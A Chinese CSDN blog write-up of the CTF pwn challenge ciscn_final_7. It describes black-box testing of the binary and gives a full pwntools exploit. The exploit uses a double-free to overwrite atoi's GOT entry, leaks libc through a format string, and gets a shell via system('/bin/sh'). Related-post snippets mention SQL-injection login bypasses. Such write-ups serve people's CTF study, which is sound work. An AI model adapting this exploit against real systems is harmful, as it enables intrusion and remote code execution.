ciscn_final_7(黑盒测试)

最新推荐文章于 2023-07-10 20:48:44 发布
最新推荐文章于 2023-07-10 20:48:44 发布
阅读量380 收藏
点赞数 1
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 UAF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107577389
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

ciscn_final_7(黑盒测试)

首先检查一下程序的保护机制

然后,我们用IDA分析一下

程序比较复杂

比较难逆向,其大致原理是fork了子进程做为一个调试进程,然后主进程里通过int 3中断通知调试器设置相应的寄存器,从而执行到其他地方。

由于整个程序主逻辑全部使用中断来实现,比较难逆向,因此我们直接黑盒测试了。

首先通过枚举choice的选项,得到了一下选项

#110 add

#120 edit

#238 del

#386 exit

然后就进行测试,发现del功能存在UAF,可以多次del,因此,这题就比较简单了。

#coding:utf8
from pwn import *

#sh = process('./ciscn_final_7',env={'LD_PRELOAD':'./libc-2.27.so'})
sh = remote('node3.buuoj.cn',27363)
libc = ELF('./libc-2.27.so')
elf = ELF('./ciscn_final_7')
atoi_got = elf.got['atoi']
printf_plt = elf.plt['printf']
#110 add
#120 edit
#238 del
#386 exit

def add(size,content):
   sh.sendlineafter('command>>','110')
   sh.sendlineafter('string:',str(size))
   sh.sendlineafter('string:',content)

def add_s(size,content):
   sh.sendlineafter('command>>','%110c')
   sh.sendlineafter('string:','%' + str(size) + 'c')
   sh.sendlineafter('string:',content)

def edit(size,new_content):
   sh.sendlineafter('command>>','120')
   sh.sendlineafter('string:',str(size))
   sh.sendlineafter('string:',new_content)

def delete(index):
   sh.sendlineafter('command>>','238')
   sh.sendlineafter('string:',str(index))

add(0x20,'a'*0x20) #0
#double free
delete(0)
delete(0)

add(0x30,'b'*0x30) #1
delete(1)
delete(1)



add(0x20,p64(atoi_got)) #2
add(0x20,'c') #3
add(0x20,p64(printf_plt)) #4,修改atoi的got表为printf的plt
sh.sendlineafter('command>>','%25$p')
sh.recvuntil('0x')
#泄露地址
libc_base = int(sh.recvuntil('invalid choice',drop = True),16) - 0xE7 - libc.sym['__libc_start_main']
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)

add_s(0x30,p64(atoi_got)) #5
add_s(0x30,'d') #6
add_s(0x30,p64(system_addr)) #7 修改atoi的got表为system
#getshell
sh.sendlineafter('command>>','/bin/sh')

sh.interactive()

 

ha1vk
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow__黑盒测试
qq_45655564的博客
07-04 405
web380-测试url参数 一开始什么也没有发现可以注入的地方,于是研究url参数。 发现每个页面都带有参数,如page_1.php,page_2.php啥的。 但是还是没有发现什么问题。 于是看了看别人的wp,发现page.php。 进去之后发现 $id.php很有问题。于是试了一下$id可不可以get传参进去,穿了一个page_1发现可以,于是试了一下另id=flag于是发现了flag web381-找后台 进去之后发现是同样的模板,于是继续查看page.php,结果发现了这个 这个想了想是没
ciscn_final_3
seaaseesa的博客
04-09 346
ciscn_final_3 程序给的glibc版本为2.27,存在tcache机制 首先检查一下程序的保护机制 然后,我们用IDA分析一下 Delete功能存在UAF漏洞 程序没有show的功能,但是add时,会显示堆的地址。 为了能够泄露出glibc地址,我们就要依靠这个add时打印的堆地址。我们只要让tcache bin和unsorted bin重合,那么就能通过申请,...
ctfshow_黑盒测试
qq_45951598的博客
12-22 471
文章目录WEB38WEB39web40web41 WEB38 payload 后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。 page.php?id=flag WEB39 这里爆出了路径,直接访问获取flag。 web40 这里和上一题一样,但是多了一个弱密码. web41 ...
ciscn_final_4(反调试+在栈上伪造堆chunk)
seaaseesa的博客
04-30 1120
ciscn_final_4 首先,检查一下程序的保护机制,没开PIE 沙箱禁用了execve,因此不能getshell,只能构造ROP来读取flag 然后,我们用IDA分析一下 Delete功能没有清空堆指针,存在UAF可以造成double free new功能可以自由控制大小 程序一开始,我们可以在栈里输入一些数据,因此,我们可以在栈里伪造一个chunk,然后利用fa...
CTFshow——黑盒测试
D.MIND 的博客
08-14 641
文章目录380381382、383384385386387388389390391、392393394、395 380 扫描一个目录,发现page.php,打开发现提示缺少id参数,且id参数控制php文件的打开,直接/page.php?id=flag即可 381 在首页源码中有可疑的路径,一层层打开看就发现flag了 382、383 两题依旧是访问后台:/alsckdfy/,弹出一个登陆界面,在账号处有SQL注入,admin'||1#即可登入 最后还是弱密码爆破一下,账密是admin:admin888
full_stack_final.zip
08-16
7. **部署脚本**:如Dockerfile或CloudFormation模板,用于在各种环境中部署应用程序。 全栈开发涵盖了广泛的技能和知识,包括前端开发、后端开发、数据库管理、版本控制、测试和部署等。学习全栈开发可以帮助...
lesson_test_calculator_final.rar_Final Test
09-19
标题 "lesson_test_calculator_final.rar_Final Test" 暗示我们正在处理一个关于软件开发的项目,特别是针对Symbian V3操作系统的一个最终测试版本。这个简易计算器是使用QT4框架在该平台上构建的,目的是作为新手...
FINAL_OFDM_FINAL_OFDM_
10-01
FINAL_OFDMOFDM(Orthogonal Frequency Division Multiplexing)即正交频分复用技术,实际上OFDM是MCM(Multi Carrier Modulation),多载波调制的一种。通过频分复用实现高速串行数据的并行传输
Power_Wastewater_final
03-18
介绍了关于Power_Wastewater_final的详细说明,提供其他AB产品的技术资料的下载。
entry-test-final.rar_Final Test
09-20
"entry-test"部分可能指的是入学考试或者某种类型的资格测试,而"final"则暗示这是整个过程的最后一个阶段,可能是期末考试或者决赛环节。 【描述】描述中提到,这个压缩包包含的是一个数字化的测试形式。这意味着...
ciscn_final_2(堆利用任意地址写4字节+劫持IO流的文件描述符)
seaaseesa的博客
04-09 706
ciscn_final_2 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 创建堆,我们只能写入一个4字节或2字节整数。 Show的时候最多也只能显示4字节数据 Delete功能没有清空指针,并且标志是共有的,因此可以通过add另外一种堆来绕过判断,造成double free。 程序开启了沙箱保护。 显然改one_gadget是不能的了。 初始化函数里...
ctfshow黑盒测试
qq_61768489的博客
01-28 621
在search.php这里使用堆叠注入来实现向link表中添加url,我们已知三个字段,并且id控制选择页面。与上题一样,不一样的点在于这题将file字符ban了,可以利用16进制0x绕过。link表里的第三个字段是url,也就认为是搜索引擎那里跳转的url。这里可以利用ssrf可以添加跳转页面即url字段,比如添加。现在的目的应该是删除这个lock.dat然后重置密码。这里传入什么参数也是靠黑盒来猜了,用file参数。$id应该是传的参数,是php的文件名。search.php的注入点,跑不出。
php黑盒测试,CTFSHOW黑盒测试
weixin_42573113的博客
03-28 367
文章目录web380payload后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。page.php?id=flagweb381payload地址在源码里面web382、383还是上面的地址,万能密码登录得到flagweb384字典生成import strings1=string.ascii_lowercases2=string.digitsf=open('dict...
ctf.show黑盒测试(web380-381)
wanan的博客
08-31 621
ctf.show黑盒测试(web380-381)
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 370
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
BROP(黑盒pwn
F_Day_的博客
10-20 1050
BROP(黑盒pwn) 这题很有意思,通过黑盒的方法来进行溢出攻击,同时这里也用到了__libc_csu_init函数利用的新姿势 题目是:brop 参考链接:https://wiki.x10sec.org/pwn/linux/user-mode/stackoverflow/x86/medium-rop/#_8 做这道题,不要ida,否则没有意义了 思路 对于黑盒,这道题的目的也很明确,就一个输入就结束了,明显的需要溢出 那么第一步就是通过不断测试字符长度来判断溢出点 这个实现还是很简单的 def ov
CTFSHOW】web入门 黑盒测试
7ruth0hn的博客
09-29 1276
文章目录写在前面web380web381web382web383web384web385web386web387web388web389web390web391web392web393web394web395参考资料 写在前面 一直没搞过渗透,先学学黑盒测试吧 web380 进入题目发现是一个关于灯泡的悲伤故事,点进去,看到跳转到page_1.php页面。 我们访问page.php试试: 发现报错:$id.php,可以猜想需要传名称为id的参数,来访问id.php。我们访问page.php?id=1试试
CTFshow 黑盒测试
Elite的博客
07-10 1014
黑盒测试是一种软件测试方法,它主要关注于测试系统外部的功能和行为,而不考虑内部的实现细节。
ctfshow之黑盒测试380-395
qq_50589021的博客
09-15 765
前言 总结黑盒测试思路 可能用到的字典 xy123 admin888 /install/index.php /clear.php /page.php /alsckdfy/index.php /debug web380——测试URL参数 web381——找后台 web382、383——sql万能密码 web384——爆破 开始过滤 爆破 字典生成: import string s1=string.ascii_lowercase # 小写字母a-z s2=string.digits # 数字 f=op
speed_bounds_final_decider
最新发布
08-13
speed_bounds_final_decider是一个确定车辆速度限制的决策器。在交通管理系统中,为了确保道路上的车辆安全和交通流畅,常常需要设定不同道路段的速度限制。speed_bounds_final_decider的作用就是根据各种因素,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值